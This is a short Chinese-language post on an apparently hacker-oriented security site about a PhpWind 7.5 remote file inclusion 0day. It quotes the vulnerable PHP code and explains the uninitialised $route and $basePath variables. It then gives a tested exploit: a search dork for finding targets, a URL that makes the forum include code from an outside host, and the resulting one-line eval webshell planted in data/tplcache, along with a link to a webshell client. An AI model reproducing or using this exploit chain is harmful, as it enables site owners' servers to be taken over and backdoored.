频道栏目
首页 > 安全 > 网站安全 > 正文

PhpWind 7.5 0day利用方法及原理

2010-01-15 17:43:40      个评论      
收藏   我要投稿

独自等待 blog

方法测试可行
<?php
if ($route == "groups") {
require_once $basePath . /action/m_groups.php;
} elseif ($route == "group") {
require_once $basePath . /action/m_group.php;
} elseif ($route == "galbum") {
require_once $basePath . /action/m_galbum.php;
}
这是PHPWIND程序有漏洞的源代码。
在代码里$route变量没有初始化,导致可以在外面给它赋值,当他的值为groups,他就会包含
$basePath . /action/m_groups.php;这个文件,而这个文件的前半部分$basePath也是个变量,同时在程序里没有给它初始化。所以,再次给它赋值,我给它赋值为http://1ii1.com.cn、所以他就包含了我http://1ii1.com.cn/action/m_groups.php这个页面的代码,我只需要在我的页面里写入复制文件的代码即可写入一句话木马

关键字"PHPWIND 7.5" inurl:com/bbs
论坛根目录添加:

apps/groups/index.php?route=groups&basePath=http://1ii1.com.cn

如:http://1ii1.com.cn/apps/groups/i ... =http://1ii1.com.cn


然后成功的话会产生一句话木马  <?php eval($_POST[cmd])?>  在:     论坛根目录/data/tplcache/1ii1.php

一句话木马客户端:http://1ii1.com.cn/yjh.php

相关TAG标签 原理 方法
上一篇:自由动力3.6 sp2的注入漏洞
下一篇:plesk虚拟主机提权
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站